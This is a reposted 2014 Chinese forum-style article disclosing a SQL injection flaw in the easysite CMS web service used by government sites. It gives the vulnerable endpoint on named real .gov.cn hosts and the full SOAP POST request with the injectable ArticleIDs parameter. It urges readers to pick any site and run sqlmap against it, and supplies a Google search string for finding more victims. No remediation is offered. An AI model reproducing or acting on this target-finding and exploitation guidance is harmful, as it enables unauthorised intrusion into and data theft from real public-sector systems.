IT技术互动交流平台

easysite内容管理系统某简单粗暴的SQL注入

作者:佚名  发布日期:2014-10-21 19:52:48

easysite内容管理系统某简单粗暴的SQL注入web services是不会骗人的~!
大量gov站点采用了easysite内容管理系统。

1.soap注入

easysite webservice 文件:

 

code 区域
http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

2.ArticleIDs参数存在SQL注入漏洞

随便找个放sqlmap里跑吧



 

 

code 区域
POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1

Host: dynamic.xmedu.gov.cn

Content-Type: text/xml; charset=utf-8

Content-Length: length

SOAPAction: "http://tempuri.org/GetArticleHitsArray"



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

  <soap:Body>

    <GetArticleHitsArray xmlns="http://tempuri.org/">

      <ArticleIDs>string</ArticleIDs>

    </GetArticleHitsArray>

  </soap:Body>

</soap:Envelope>

如果你不知道谁在用easysite,那就google(If you can open it)下把:


inurl:asmx DesktopModules



(海关总署N个域名都是这套系统)

修复方案:

GOV 网站,还是你们的公务员去修复吧,我只是一个小小的无名黑客,我怕被你们以跨省名义逮捕,那我无处申冤。

 

Tag标签: 管理系统   内容  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规